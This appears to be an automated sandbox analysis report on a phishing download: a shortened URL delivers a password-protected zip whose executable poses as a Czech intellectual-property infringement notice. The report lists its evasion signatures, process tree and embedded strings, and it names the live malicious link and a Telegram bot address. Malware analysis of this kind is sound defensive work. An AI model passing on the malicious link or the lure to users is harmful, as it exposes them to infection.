Edit tour

Windows Analysis Report
https://tinyurl.com/yep5ph9f

Overview

General Information

Sample URL:https://tinyurl.com/yep5ph9f
Analysis ID:1649464
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Yara detected ZipBomb
Downloads suspicious files via Chrome
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • unarchiver.exe (PID: 6900 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6800 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4992 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • chrome.exe (PID: 7024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/yep5ph9f" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • unarchiver.exe (PID: 3432 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
    • 7za.exe (PID: 596 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmpJoeSecurity_ZipBombYara detected ZipBombJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
    Source: Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: SumatraPDF-no-MuPDF.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: SumatraPDF-1.5.3.0.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
    Source: Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Images.png.14.dr
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
    Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Images.png.14.dr
    Source: Binary string: libmupdf.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://HDMHDMLoading...%s
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContribute
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlThe
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://blog.kowalczyk.infoKrzysztof
    Source: Images.png.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: Images.png.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: Images.png.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD
    Source: Images.png.14.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Images.png.14.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Images.png.14.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Images.png.14.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Images.png.14.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: Images.png.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: Images.png.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: Images.png.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://itexmac.sourceforge.net/SyncTeX.htmlJ
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://mupdf.comMuPDFpdf
    Source: Images.png.14.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: Images.png.14.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: Images.png.14.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: Images.png.14.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Images.png.14.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Images.png.14.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Images.png.14.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://p.yusukekamiyamane.com/Yusuke
    Source: Images.png.14.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Images.png.14.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://william.famille-blum.org/William
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSo
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?c
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.flashvidz.tk/Zenonprogram
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.freetype.org/FreeTypefont
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.haihaisoft.com/Contact.aspx
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.haihaisoft.com/Contact.aspx%u%?.Install_DirSoftware
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMS
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.haihaisoft.comSumatraPDF
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.winimage.com/zLibDllbad
    Source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.zeniko.ch/#SumatraPDFSimon
    Source: Evidence.??d??o??c??x.14.drString found in binary or memory: https://t.me/MEXX6toHNBot
    Source: Images.png.14.drString found in binary or memory: https://www.globalsign.com/repository/0

    System Summary

    barindex
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\Ozn.men._o_zjiat.n._poruaen._pr.v_duaevn.ho_vlastnictv._.zip (copy)Jump to dropped file
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir5556_2049845984Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir5556_2049845984Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_6FDF57D718_2_6FDF57D7
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_6FDFE53018_2_6FDFE530
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_6FDFF2EB18_2_6FDFF2EB
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_73D61BC718_2_73D61BC7
    Source: Images.png.14.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: classification engineClassification label: mal52.evad.win@38/11@0/10
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmpJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
    Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/yep5ph9f"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
    Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
    Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,2845414822576318589,8729507620722358709,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:3Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"Jump to behavior
